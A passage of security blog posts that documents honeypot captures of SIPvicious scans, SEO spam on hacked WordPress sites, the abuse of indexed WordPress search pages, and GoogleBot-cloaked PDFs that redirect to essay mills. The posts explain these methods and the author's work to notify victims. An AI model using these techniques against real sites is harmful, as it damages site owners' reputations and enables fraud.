For the rest of us, maybe dispensing with this notion of conquering our fears and, instead, trying to live with, use, and (for the most part) ignore our fears is the way to go. Maybe then we can see our fears as a useful means for moving our lives in a direction we want to go.

And, dear universe, for now (at least): I’m still here.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 11, 2021

That got me to thinking: What the heck is going on with SIP?

I’m a pretty pragmatic kinda’ guy. I once gave a presentation at a SANS event with the title, Hacking Ugly, which - in reality - was just an ode to pragmatism. In it, I made this argument: We can all appreciate a beautifully constructed tool or an incredibly complex and well-structured pentest attack. But most of the time, it’s hastily thrown together scripts or meatball attacks that actually win the day.

So I started thinking about SIP hacking from a pragmatic point of view. Seriously, what’s going on here?

The Session Initiation Protocol (SIP) is a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications.^* SIP is used to provide signaling for Internet-based telephony by private, IP-based telephone systems (think IP PBX systems, like the open-source tool Asterisk).

The title of this little literary gem is a riff on what are supposedly the first words, spoken by Alexander Graham Bell, when he demonstrated his ability to “talk with electricity” way back in 1876 (“Mr Watson, come here. I want to see you.”). I’m pretty sure Bell would be amazed at what his invention has become.

SIP, in many ways, takes inspiration from another communication protocol, SMTP, and we all know how well that particular exercise has turned out from a security perspective… so you gotta figure SIP is a minefield too.

And it is…

SIP generally is run on port 5060/UDP, and on a daily basis, I see a bunch of stuff like this hit my honeypots:

00000000  4f 50 54 49 4f 4e 53 20 - 73 69 70 3a 31 30 30 40  |OPTIONS sip:100@|
00000010  XX XX XX XX XX XX XX XX - XX XX XX XX 3a 35 30 36  |XXXXXXXXXXXX:506|
00000020  30 20 53 49 50 2f 32 2e - 30 0d 0a 56 69 61 3a 20  |0 SIP/2.0..Via: |
00000030  53 49 50 2f 32 2e 30 2f - 55 44 50 20 30 2e 36 2e  |SIP/2.0/UDP 0.6.|
00000040  31 31 2e 31 36 33 3a 35 - 30 36 31 3b 62 72 61 6e  |11.163:5061;bran|
00000050  63 68 3d 7a 39 68 47 34 - 62 4b 2d 33 32 35 36 35  |ch=z9hG4bK-32565|
00000060  31 30 38 34 35 3b 72 70 - 6f 72 74 0d 0a 43 6f 6e  |10845;rport..Con|
00000070  74 65 6e 74 2d 4c 65 6e - 67 74 68 3a 20 30 0d 0a  |tent-Length: 0..|
00000080  46 72 6f 6d 3a 20 22 73 - 69 70 76 69 63 69 6f 75  |From: "sipviciou|
00000090  73 22 3c 73 69 70 3a 31 - 30 30 40 31 2e 31 2e 31  |s"<sip:100@1.1.1|
000000a0  2e 31 3e 3b 74 61 67 3d - 36 31 33 32 36 34 33 39  |.1>;tag=61326439|
000000b0  33 37 33 39 33 37 36 34 - 33 31 33 33 36 33 33 34  |3739376431336334|
000000c0  30 31 33 32 33 32 33 38 - 33 35 33 35 33 37 33 35  |0132323835353735|
000000d0  33 38 33 37 0d 0a 41 63 - 63 65 70 74 3a 20 61 70  |3837..Accept: ap|
000000e0  70 6c 69 63 61 74 69 6f - 6e 2f 73 64 70 0d 0a 55  |plication/sdp..U|
000000f0  73 65 72 2d 41 67 65 6e - 74 3a 20 66 72 69 65 6e  |ser-Agent: frien|
00000100  64 6c 79 2d 73 63 61 6e - 6e 65 72 0d 0a 54 6f 3a  |dly-scanner..To:|
00000110  20 22 73 69 70 76 69 63 - 69 6f 75 73 22 3c 73 69  | "sipvicious"<si|
00000120  70 3a 31 30 30 40 31 2e - 31 2e 31 2e 31 3e 0d 0a  |p:100@1.1.1.1>..|
00000130  43 6f 6e 74 61 63 74 3a - 20 73 69 70 3a 31 30 30  |Contact: sip:100|
00000140  40 30 2e 36 2e 31 31 2e - 31 36 33 3a 35 30 36 31  |@0.6.11.163:5061|
00000150  0d 0a 43 53 65 71 3a 20 - 31 20 4f 50 54 49 4f 4e  |..CSeq: 1 OPTION|
00000160  53 0d 0a 43 61 6c 6c 2d - 49 44 3a 20 31 37 35 32  |S..Call-ID: 1752|
00000170  34 38 31 34 35 30 30 32 - 31 32 37 35 36 30 37 31  |4814500212756071|
00000180  35 30 39 35 0d 0a 4d 61 - 78 2d 46 6f 72 77 61 72  |5095..Max-Forwar|
00000190  64 73 3a 20 37 30 0d 0a - 0d 0a                    |ds: 70....      |

This particular attack is the result of someone running SIPvicious, the “friendly-scanner,” a SIP auditing tool used to scan for and enumerate SIP devices and accounts. It can be obtained freely from its GIT repo or it can be found bundled with security auditing tools like Kali.

I did some checking, and I’m seeing, on average, approximately 300 of these a day - or one every 4.8 minutes. While that doesn’t approach the level of, say, RDP scanning, it’s still a lot.

Over the past few weeks, I’ve logged about 3000 different source IPs scanning for SIP. That’s a pretty considerable number.

All of this attack traffic and all of these sources mean that the bad guys have a considerable “investment” in infrastructure aimed at SIP. But for what? How many targets can there be?

I’ve seen this cruft in my logs for years. Seriously, this has to be a dead end, right?

I started doing a little research, and it turns out that there are a whole lot more here than you’d think.

Let’s just do a little back of the envelope math, based on what I found:

• According to the fine folks at Asterisk, they have 1.3 million new endpoints hitting the ‘Net each year (whoa!)
• That works out to about 3500 new endpoints per day
• Asterisk isn’t the only game in town, but it’s probably the biggest… so let’s just assume 5000 total new endpoints a day
• Being generous, let’s figure only 5% of those new endpoints are being set up by a first-rodeo, VoIP bubble-head and are poorly configured and vulnerable to exploitation
• So as a diligent SIP scanner, you’re competing for a new supply of, let’s say, 250 vulnerable new SIP endpoints each day
• With a tiny 100 member botnet, you could grab… Wait… wut?
• Generate some ca$h with kickbacks you get for dialing premium rate numbers (charged to the owner of the PBX), $ell “phone service,” or u$e these (generally beefy) $ervers for $ome crypto mining…

Ok. Now I understand.

Do you ever get the feeling like you’ve taken the wrong path in life?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 10, 2021

^*Blatently ripped off from Wikipedia. (The Oracle of All Knowledge^™. Praise be... Praise be...)

For example: reading through the posts on this blog might lead you to think that I have a high rate of interactions with the owners of compromised sites. That’s because I tend to focus on only the interesting stories (or at least what I think are the interesting stories - you may feel differently). Those stories tend to be ones where I actually have some interaction with a site owner - for better or for worse.

This post isn’t going to be about that.

This post is about the vast majority of the dull boring stuff that goes on from day-to-day.

It’s a story of unanswered emails, phone calls that get ignored, and tweets that seem to fall on deaf ears.

Through the years, I’ve notified well over a thousand sites that they’ve been 0wned. I say that not to brag (seriously I send emails to people telling them that their site’s been whacked to sell boner pills and term papers - not really a braggin’ kind of subject…) but just to give you an idea of scale.

Over the past four days, I’ve tracked down and attempted to notify the owners of 19 websites that have been the victim of blackhat SEO attacks. Nineteen.

Most of these sites have been altered to flog the aformentioned boner pills. A handful are selling cheap NFL jerseys and one is selling knockoff designer handbags - unless, of course, the makers of real designer handbags have resorted to whacking sites to boost sales.

One lucky site is selling all three. And Nike shoes. And term papers.

Somebody is an overachiever…

Sixteen of nineteen are running WordPress. Two are running what appears to be homegrown PHP code. One is an apparent exercise in self-flagellation via Java (I don’t know which to feel worse about - that they got 0wned or that they wrote their site in Java).

A few are sites that were “professionally” designed. They have these goofy “Created by X” taglines at the bottom of the page, proudly proclaiming that an “Online Marketing Professional” was involved in the making of the disaster. (Tom’s $0.02: You probably wanna think twice about putting your name on a crappy WordPress site that’s likely going to get neglected and 0wned. That’s really not a good look.)

Among the owners: a private school, a pharmacology college, a community outreach center, a professional lighting company, a couple of local governments, a county superior court, and really good photographer.

I’ve sent emails and I’ve sent tweets. I’ve contacted the “professional” website design firms along with their customers. I’ve left four voicemails for IT folks.

Cutting to the chase: I’ve heard back from exactly zero.

Zip, zilch, nada.

Today, I’ll probably do a few more Google searches, find a few more sites, and spit out a few more emails/tweets/calls.

Why not? I've spent a lot of time over the years pounding my head against The Big Internet Wall of 0wned Sites^™. What's a few more blows to the head? Ask anyone: my skull is pretty thick.

And who knows… maybe, if I’m lucky, I’ll get to chat with someone who will get angry at me, or accuse me of hacking their site. That’s ok too… my skin is pretty thick.

But I do get tired. Over these years I’ve taken a break or two. The last one was for about four and a half years. You see, all of this gets to be wearing after a while.

Not the mean, crabby people…

Not the accusations.

Far more wearing is the silence. That feeling like you’re standing and screaming into the void. That’s what makes me tired.

But it’s all good. After some time off - a little vacation - I always come back.

Why?

Because, every once in a while, a site gets fixed. The boner pill ads silently disappear.

I take those as a win.

Even more rarely, someone sends me an email and says, “Thank you for letting me know.”

And, believe it or not, that one small gesture fixes a whole lot of silence.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 7, 2021

They bother me.

They really bother me.

Maybe it’s the brazen quality of the whole thing. I’ve said it before: it’s kinda like breaking into someone’s house and leaving behind a note with your name and phone number scrawled on it.

That bothers me, but that doesn’t really cover it.

Did I mention that these guys really bother me?

I think it has to do with bullying. Bullying can take all kinds of forms, and I suppose I view what they do as intellectual bullying. They tend to go after the sites of smaller organizations - sites run by… well… business folks - people who have to rely on something like WordPress because they don’t have an IT department.

These folks don’t have time to learn how to set up and secure a website, so they find a CMS that promises it’ll be easy, throw together some markup, and when the output looks decent, they think that they’re done.

But then some dude who’s learned more about how to exploit website misconfigurations than about how to be a decent human being comes along and uses their intelligence to take advantage. Traditional bullies use their physical prowess to abuse people who are smaller and weaker. Intellectual bullies use their intelligence in an analogous way - and it’s still abusive, still bullying.

That’s what bothers me - because bullying is wrong - whether you do it with brains or brawn.

Earlier today, I found the following on the hacked site of a small pharmacology school:

There’s three things that really bother me about this:

• The hack took advantage of a WordPress flaw. WordPress runs something like 40% of the websites on the Internet. These jerks had plenty of other sites to target… But no. They had to put their Erectile Dysfunction (ED) drug spam on the site of a small pharmacology .edu site - potentially damaging their reputation. Tell me that isn’t abusive, tell me that isn’t bullying, tell me that isn’t just frickin’ adding insult to injury.
• In addition to that particular a**hole move, these pinheads can’t even be bothered to un-indent that final </html> tag - which is driving me just a little bit crazy every time I look at it.
• In the spirit of piling on, one of their subdomains has been whacked by my buddies the term paper SEO hackers… nice, real nice.

I don’t know if I’ve made this clear: these guys really bother me.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 5, 2021

You done brang it on yourself.

I’ve used that line over the years to great effect (just ask my kids). I’ve also used another, related expression as well:

Play stupid games, win stupid prizes.

They both speak to the same point: The stuff we do has consequences.

Sometimes, we’re prepared to face those consequences because we can see them coming. Sometimes we can’t. Sometimes, we let ourselves be convinced that we can be careless about the things we do, and there won’t be any consequences.

But there are. There always are.

I’ve ranted in the past about how much I dislike the way that content management systems (CMS) like WordPress (The WebApp Hacker’s BFF™) get marketed:

“Build simply. Create any kind of website. No code, no manuals, no limits.”

This is just dumb. Any fool can use WordPress to create a website and, literally, thousands do. But just because WordPress lets you create a web page without having to know squat about HTML, CSS, and JavaScript doesn’t mean you should. Unless you’re careful, there will be consequences.

You see, you can’t let a chunk of software do your thinkin’ for you - because you never know when that software is going to do something stoopid¹. Worse still, if you go ahead and spew out a WordPress site while having no idea how any of this stuff works, you likely won’t even notice when WordPress does that stoopid thing.

What stoopid thing has WordPress done now?

Simple. By default, the results of the built-in search for WordPress returns pages that aren’t marked with a <meta name='robots' content='noindex'> tag.

If you’re looking at that and thinking hmmm… gibberish then let me explain. HTML, the language used to create web pages, is what is known as a “markup language.” Essentially, as a markup language, it takes the text of the web page, and adds a number of special tags to “markup” the text in a way that tells your browser how to display content on the page. When I want to create italics, the text to be italicized is placed between two special tags: <i>Italicize this</i>. Back in the good old / bad old days, word processors worked this way as well… until the advent of the WYSIWYG (What You See Is What You Get) interface. I have both happy and horrific memories of the tags in WordPerfect (an ancient, non-WYSIWYG word processing program I used 25 or so years ago…)

There are several special markup tags in HTML that have nothing to do with formatting the webpage itself, but are used for other purposes. One of those, the <meta> tag, is used to pass along various types of information about the page itself. These <meta> tags are used to describe keywords about the page, or to give directions to various tools that might “consume” the page for various purposes. One of those tools would be a search engine, like Google, that would scan the page so that it can be indexed in a way that other people can find it.

Which leads us to the “noindex” <meta> tag. Sometimes, you just don’t want a search engine to index a page from your site. There are lots of reasons you might want to do this: perhaps the page is transitory (a page generated from a search or for printing) or a different version of a standard page created only for mobile browsers. Generally speaking, something like the transitory results of a search page should not be indexed. It just doesn’t make much sense for… well… almost every site, so search results should be marked with a <meta name='robots' content='noindex'> tag by default. If you have a specific reason for wanting your search results to be indexed, then you would probably have the ability to figure out how to disable this default behavior.

tl;dr: The default behavior for search results should be noindex.

But it isn’t.

Not in WordPress.

Nope.

Thank you, WordPress.

“What’s the big deal,” I hear you ask? “So a bunch of ‘Net yokels have their search result pages indexed by Google…”

But it is a big deal.

A very big deal. Check this out:

This is why we can’t have nice things. What do all of these sites have in common? They’re run on WordPress.

Every time WordPress makes a stoopid mistake like this, there’s a line of scammy, scummy, little bastards salivating to turn it to their advantage. In this case, the part of the bastards is being played by purveyers of “research” papers trying to boost the search engine placement of their site using less-than-legitimate methods. By getting their “buy research papers cheap” site mentioned on LOTS of legitimate sites, they’re seen as more popular and therefore get placed closer to the top of search results. It’s called Search Engine Optimization (SEO), and this is a pretty sleezy way to do it. (Note: there are actually legitimate SEO methods - this isn’t one of them.)

In this case (I believe) here’s how it works.

• The scammer adds a triggering link to a site that gets indexed by Google
  • This link is a URL to a mainstream WordPress-based site, with parameters that trigger a search page with the information for the site the scammer wants to boost
  • http://site_running_wordpress.com/?s=lots_of_crap_including_their_name_and_url
• Google spiders the site, sees the triggering link, and adds it to the list of pages to index
• Google eventually spiders the link (with the search parameters attached)
• The default behavior of WordPress is to include the search terms on the generated search page.
• Because the WordPress search results page isn’t tagged as noindex the page is added to Google’s index for the legitimate site
• The bastards remove the link, rinse and repeat

Because the page content is generated by the URL, every time Google returns to check the page, it will see that content again. As far as Google is concerned, that search page (and all of that SEO stuff) is part of the victim site. FOREVER.

So… what’s to be done? Well, obviously, the folks at WordPress need some learnin’. (Please note: As my buddy Don “Cutaway” Weber always says: Some folks need to get education from a book, others need to get learnin’ from a stick…) Here’s the stick: Yo! WordPress! Why the hell do you not mark search pages noindex by default? Seriously!?!? You know all those people who you’ve convinced to “create any kind of website with no code, no manuals, and no limits?” You’re potentially placing their reputations at the mercy of any unscrupulous jerk who wants to use their site to boost the search engine placement of their less-than-legitimate business. Not cool. Not cool at all.

As mitigation, you can use a plug-in like Yoast SEO that automatically marks search pages noindex (as God intended) until the WordPress devs get their heads screwed on right and fix² this.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 2, 2021

¹ This is how we spell "stupid" 'round here. Generally, for effect. There's "stupid" and then there's "stoopid."

²UPDATE (3/3/2021): It looks like someone else has already pointed this out to the WordPress folks and they've fixed it in their upcoming (next week!) release, 5.7. See here for the ticket tracking this issue.

I’ve done some checking, and if a noindex meta tag appears on these pages, Google (and other search engines) should remove the pages from their index. That’s good news for the Internet, and bad news for the SEO hackerz.

I’m heartbroken for them.

Really.

I can, however, generally wrap my brain around many of the scams and cons that make up the base of what has come to be known as “cyber attacks” (drink!).

What I found today is different. I haven’t got a clue.

Having had a few “run-ins” with some of the fine, upstanding folks who supply pre-written term papers to spoiled post-pubescents with more money than ethics, I was trolling around the dark underbelly of the Internet in search of SEO hacks.

Search Engine Optimization (or SEO) is a term for a bag o’tricks designed to make your website appear higher in search engine listings. Some of these “optimizations” are totally legit (i.e. using “META” tags in the header of your web page to highlight specific keywords from your content) and some are… well… let’s just say that they’re of “questionable legality.”

One of the strongest parameters controlling your site’s placement in search results is the number of other sites that link to you. Sites with lots of inbound links are viewed as being more popular and therefore rank higher in search engine results. The algorithms behind search engine rankings also take into account the popularity of the sites that link to yours… creating a sort of unholy bouillabaisse of circular references. Be that as it may, this “popularity of the sites linking to you” thing is very important because, back in the day, scammy folks used to set up sites containing nothing but links to their other sites… as a means of driving their search engine ranking higher. By limiting an inbound link’s SEO “boost” based on the popularity of the site it comes from, these “link-farm” sites became useless… because a site containing pages of nothing but links to other sites isn’t very popular… unless your name is… well… Google.

So what’s a poor, morally bankrupt purveyor of pre-written research papers to do? How can they find a way to differentiate themselves from all of the other poor, morally bankrupt purveyors of pre-written research papers? They could try to get one hugely popular site to link to them, or they could somehow get links on LOTS of smaller sites…

And so, these bastions of business acumen spend years toiling to provide their clientele with superior products and service. In turn, their clients - bathed in the almost effervescent aura of customer satisfaction - throw caution to the wind and write glowing reviews (complete with links) on their personal blogs, in spite of the fact that they are, essentially, admitting to purchasing their diploma rather than… you know… actually thinking.

Nah… just kidding. They hack a bunch of sites.

In a strangely eerie parallel to their entire business model, these lowlifes take the easy road to search engine ranking by hacking into sites and creating links back to themselves. (Important note: it isn’t just the term paper jockeys doing this stuff… pretty much every questionable ‘net “business” out there - from “cheap cigarettes” to “pharma” to “genuine ’nfl’ jerseys” - is doing SEO boosting hacks…)

“Hold on a dang second…,” I hear you cry. “Isn’t that like a burglar leaving a note with their name and address on it at the scene of the crime?”

That’s EXACTLY what it is like - and yet they still get away with it. Why? Because, apparently, I’m the only person in the world who gives a crap about this stuff… (Important note #2: Sometimes the links just appear. Who knows how. They just do. Or… sometimes the links are placed by competitors. Yeah. That’s it. Competitors. EEeeevil Competitors…)

But I digress…

Today, I happened to notice that a bunch of unrelated sites had PDF files added to them that appeared to be advertising term paper “services.” I was intrigued, so I grabbed a few.

That’s where the puzzle began. You see, I simply don’t understand what’s going on. But, before I go on to describe what I don’t know, let me start with what I do know:

1. The hacked sites are all running WordPress (“The WebApp Hacker’s BFF”™)
2. These files are absolutely meant for Google’s consumption. The only way that you can get the file is if the User-Agent on the request matches GoogleBot. (English translation: Every time you request something from a web server, your browser identifies itself so the server can - potentially - deliver content that may be tailored to the type of browser you’re using - ex. a browser on a mobile phone might get different content from a browser for a system with a larger screen, like a desktop computer. The browser does this by passing along something known as a “User-Agent” string peculiar to the type/version of browser you’re using. When Google indexes web pages for their search engine, they use a tool that visits websites - known as a “spider.” This tool, which goes by the name “GoogleBot,” uses a very specific “User-Agent” string that can be easily identified.)
3. The PDF files appear to be generated with TCPDF, a PHP library that is often used for generating PDF files from web applications. HOWEVER: The files themselves appear to be static. TCPDF actually generates a date/time string when the file is created and edited - these DO NOT change when grabbing a file multiple times. Initially, I thought that TCPDF might have been installed on the site as part of the hack to generate PDFs on the fly, but having grabbed the same file repeatedly and seen no difference, I don’t think it is.

But what doesn’t make sense is this: The PDF files contain NO LINKS. Not one. None. Zilch. Zip. Zero. Nada…

What is the point of an SEO hack without links?

Maybe I’m missing something. I have to be missing something.

I even asked Didier Stevens - who has probably forgotten more about PDF files than I ever knew - to take a look. He confirmed what I was thinking: these files have no links… and therefore no real SEO value.

You can take a look for yourself. I’ve posted one of the files (zipped) here. (Note: While I’ve looked at this thing six ways to Sunday and seen nothing malicious, I make no guarantees that opening it won’t blow up your computer, kill your dog, and turn you sterile… You’ve been warned.)

I don’t get it…

Why go to the trouble of hacking a website just to install these lame PDF files? On top of that, there is evidence that someone has been going around and placing comment spam with links to these files. What’s the point? Remember: These files are only going to be seen by GoogleBot, so that places a huge “fence” around their potential uses.

Anyone have an idea?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
September 14, 2016

UPDATE (September 15, 2016): Ok, after doing a little more digging, I think I may have a handle on what is going on here. Before I get into describing what I think the point of all of this may be, let me explain some additional details that I’ve found that led me to my conclusion.

The first clue came when I did a little additional searching using Google’s “site” parameter (to lock my search to the site in question) coupled with “filetype:pdf”. (Note: It appears that the PDF files added by the attacker are the only PDF files on this site…) I was somewhat shocked to see that Google had indexed 2,500 “PDF” files added to the hacked site. Yes, you read that right… The content added by the attacker is somewhere around 20 times the number of pages of the site’s original content.

The next clue came when I followed one of the links from the Google search page and ended up triggering this cascade of redirects:

HTTP/1.1 302 Moved Temporarily
 Redirect to: http://lnkgo.net/zHU2hoJ
Date: Thu, 15 Sep 2016 04:04:19 GMT
Server: Apache
Location: http://lnkgo.net/zHU2hoJ
X-Powered-By: PleskLin
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

GET http://lnkgo.net/zHU2hoJ
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

HTTP/1.1 301 Moved Permanently
 Redirect to: http://www.paperhelp.org/?pid=7783
Date: Wed, 14 Sep 2016 21:28:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.45
Location: http://www.paperhelp.org/?pid=7783
Content-Length: 0
Content-Type: text/html; charset=UTF-8

GET http://www.paperhelp.org/?pid=7783
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=t5chg9l1eu7qilq6qgnbpds8g5; partner_id=7783; un=1; client_start_time=1473888484; client_country=US; client_ip=162.217.121.125

Note: I tried it multiple times with multiple files, always ending up at paperhelp.org…

So, functionally, here’s what seems to be going on:

1. The attackers gain access to a WordPress site using some flaw du jour affecting WP
2. The attackers then alter the WP code to perform the following actions:
   • When GoogleBot comes calling, it serves up a PDF file containing a “potential term paper topic” as its title. There are LOTS of these “PDFs” on a given hacked site.
   • If someone browses to the site, looking for one of those PDF files, and has Google (and - potentially - other search engines) as a Referrer, it redirects to lnkgo.net (which, in turn, redirects to paperhelp.org)
   • Anything else… let it fall through to the site itself… in the case of the PDF files - that don’t actually exist at the location they’re being requested from - the site returns a normal HTTP 404 error.
3. The attacker then goes about using “traditional” comment spam to “seed” the PDF links into Google’s search database.

So… none of this was making sense because I was expecting this to be “standard” SEO hacking - but this isn’t a “standard” SEO hack. I think what’s going on here is something like the “spear phishing” version of SEO hacking.

Essentially, this seems to be an attempt to plaster Google with a metric-crap-tonne of individual PDF files, each containing an “essay-topic-like” title, and enough keywords to potentially get noticed by someone desperately searching for information on that essay topic. Clicking on the search engine link will then fast-forward you to the term-paper-for-sale site.

Now… far be it from me to even begin to question how the fine, upstanding folks at paperhelp.org shadily advertise their already relatively shady business. (I know that they’re probably going to be reading this at some point, so please indulge me while I save them the trouble of denying all of this: “Of course you didn’t have anything to do with these files appearing on these hacked systems. Of course it’s just a miraculous coincidence that clicking on the links in Google’s search results ended up dumping me out at your website. The Internet is filled with miraculous coincidences like that…”) Anyhoo… I’m thinkin’ that this “spear-SEOing” will only work if you have a broad enough list of potential essay topics and if you get enough PDF files out there (and noticed by the search engines…) - and, most importantly, those sites stay hacked. Unfortunately… all of that is going to quickly fall apart as I spend the next few days exercising Google’s search capabilities and notifying site owners.

Sorry, paperhelp.org. Perhaps, like the fine folks at SpeedyPaper, you shoulda’ done a bit more research.

P.S. - Since I’m pointing various government agencies as well as those whose sites have been hacked at this page, I want to state: I’ve got full logs of everything I’ve found, just in case anyone out there would like to (legally) stomp on these bastards.

Our house is now a mildly humid wasteland of locations I’m currently not allowed to walk, so instead of sitting up in my nicely appointed office, I’ve been banished to the basement (the only place in the house - besides the four-year-old’s room - that didn’t get cleaned and isn’t all… well… moist.)

So I’m sitting in the basement watching a dumbass mouse, that somehow ended up in our window-well, beat his tiny little brains out jumping against the window rather than climbing up the stick I leaned down in there earlier today as an escape path for him.

It’s all left me in what can best be described as a mood.

CLIMB THE FRICKIN’ STICK YOU IDIOT!

Anyhoo… Either because of the swampy carpets or Jumpy the Wonder Mouse™, I’m in a mood, and what better way to expend some pent-up moodiness than to screw with Internet Denizens of Questionable Morals (IDQMs for short).

NOTE: Above, you’ll find a lovely collage of action shots of “Jumpy”. You’re welcome.

Having had more than a bit of fun earlier in the summer with one of my favorite IDQMs, SpeedyPaper, I decided to see if I could make their life a little more interesting.

[A recap: Earlier this summer, I found that someone had hacked several websites - The U.S. Capitol’s Virtual Tour, The Navy League (a charitable organization that supports the US Navy and Coast Guard), and the Holiest of Holies: the website of Skyline Chili. In each instance, the hackers had left behind “SEO” links that round-robin redirected anyone following them to several purveyors of “term paper assistance.” I notified the affected site owners and also called out SpeedyPaper (a “beneficiary” of these links), via their Twitter account, to ‘splain just exactly how links leading to their website had “appeared” on these hacked sites. You can read the details of those sagas here and here.]

Today, I decided to do a Google search for “site:.org speedy paper term”. This locks my search to the “.org” top level domain (TLD) and finds pages that contain the words “speedy,” “paper,” and “term.”

Hey… lookie there!

Aaaaand… another site joins the “research paper SEO” hit parade. This time, it’s the site for the Town of University Park, Maryland.

Clicking on that link created the following cascade of internet linkage:

GET http://www.upmd.org/index.php/lead-research-paper/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=646b4155b76b9632d52a3d64becb076b

HTTP/1.1 307 Temporary Redirect
 Redirect to: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=upmd.org&utm_referrer=http%3A%2F%2Fupmd.org%2Findex.php%2Flead-research-paper%2F&utm_keyword=lead+research+paper
Date: Thu, 08 Sep 2016 16:32:49 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch11 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch11
Location: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=upmd.org&utm_referrer=http%3A%2F%2Fupmd.org%2Findex.php%2Flead-research-paper%2F&utm_keyword=lead+research+paper
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

GET https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=upmd.org&utm_referrer=http%3A%2F%2Fupmd.org%2Findex.php%2Flead-research-paper%2F&utm_keyword=lead+research+paper
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dee0a566f25b25cba8a72327465573e201473350225; spv=eyJpdiI6IlJ3T3RJeFNqMHlmSnZEXC9kZ0R3bXlBPT0iLCJ2YWx1ZSI6IkNUbTM1SW1qUmdnaFQrQUxTZFgwK0E9PSIsIm1hYyI6ImQ5YWM3NjAyMjU2NTQ3NWMyYTQwODI2MDZlYzE5OTE2NDAzNWY2MzUxZDI1ODNlNjEyNDU0MmJmOTYwMzE5NTYifQ%3D%3D; spu=eyJpdiI6InE5S001V0F4NnR1VFF5OEQ5eE5KQ3c9PSIsInZhbHVlIjoiMlFpaWQzY3BnY0VMNTdQUWY5TlwveXc9PSIsIm1hYyI6IjJkNmU0ZjM3ZTQ1ZWQyY2I3ODRhZDExZWJlYzA4OGM1YjgwM2EwMDQ0ZTRlYzA1MzU1MTRjMjRjYWIzNTM2MTkifQ%3D%3D; spvis=eyJpdiI6IkRFcWdzQlRtdmJPdHEzSmVkRUwzN0E9PSIsInZhbHVlIjoiemYyb090MGlucFFlZjZ4VkxyZTJ1QT09IiwibWFjIjoiMDk4ZDljMzYwM2E0NzdjZGM2ZTJhYTFmNjdkNGQwODA4OTM2MDAyMjJiZmU3NTdiMTI0MDkzMmVhNTc0M2FmMiJ9; laravel_session_speedypaper=eyJpdiI6IlV2WUJYVDFhUXVqdERwZUppT1dXS0E9PSIsInZhbHVlIjoiVWlYVmhwK0Uxa2ZiV1ZpSjRmbGFBM2pjU09id2ZCeVRGR040T2Y3K1BNYTBaVjVIelJ4eHIrRXBCc1ZYNFBQQ1VUUjczK0NMZGZrcGVmbDJWdlVaUFE9PSIsIm1hYyI6ImFhMjQ1ZTFkMWJmMWI1ZDg0ZWFlNmM0MGI0N2JlY2RlZDM1ZDYyZDg5OTMwZDVjZWU4YjRhMjNkYzlhNDhkN2QifQ%3D%3D

HTTP/1.1 302
 Redirect to: https://speedypaper.com/
status: 302
date: Thu, 08 Sep 2016 16:32:49 GMT
content-type: text/html; charset=UTF-8
cache-control: no-cache
location: https://speedypaper.com
